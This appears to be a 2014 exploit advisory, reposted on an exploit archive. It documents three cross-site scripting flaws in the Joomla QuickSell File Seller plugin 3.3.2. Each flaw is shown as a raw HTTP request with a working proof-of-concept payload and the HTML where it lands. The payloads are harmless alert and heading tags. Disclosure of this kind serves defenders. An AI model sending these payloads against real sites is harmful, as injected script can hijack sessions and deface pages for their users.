Joomla QuickSell File Seller Plugin - Multiple XSS

#Title: Joomla - QuickSell File Seller Plugin - Multiple XSS
#Date: 01.19.14
#Version: 3.3.2 (Latest ATM)
#Demo: demo.shopfiles.com (extensions.joomla.org/extensions/e-commerce/paid-downloads/19602)
#Contact: [email protected]

1. Persistent Cross Site Scripting - Add to Cart

While adding specific file to cart, parameter 'file' is transmitted via
POST query. All you have to do is edit $_POST['file'] variable while submitting it.

Example:
POST /index.php HTTP/1.1
Host: demo.shopfiles.com
Content-Length: 82
Connection: keep-alive

option=com_quicksell&task=cartAdd&format=raw&file=ed963a3d329ebcfa2c633a06ff5f82ff" onmouseover=alert(666) bad="

As you can see, JS code has been added in 'Cart' div.
<li><a title="" href="#" class="cartRemove" data-file="ed963a3d329ebcfa2c633a06ff5f82ff" onmouseover=alert(666) bad="">&#36;0.00 </a></li></ul><p>Total: &#36;0.00</p></div>

2. Cross Site Scripting - Print Document

Vulnerable variables are - $_GET['print'] & $_GET['page'].

Example:
GET /?tmpl=component&print=1c7726"><script>alert(666)</script>&page=666"><script>alert(666)</script> HTTP/1.1
Host: demo.shopfiles.com
Connection: keep-alive

Injection point:
<input type="hidden" name="cancel_return" value="http://demo.shopfiles.com/?tmpl=component&print=1c7726"><script>alert(666)</script>&page=666"><script>alert(666)</script>"/>

3. Cross Site Scripting - URL

Hidden value named 'cancel_return' is processing URL provided by user.
In that case, we are able to inject our code anywhere via URL.

GET /?666"><h1>Sup?</h1>=1 HTTP/1.1
Host: demo.shopfiles.com
Connection: keep-alive

Injection point:
<input type="hidden" name="cancel_return" value="http://demo.shopfiles.com/?666"><h1>Sup?</h1>

#  0day.today [2018-01-04]  #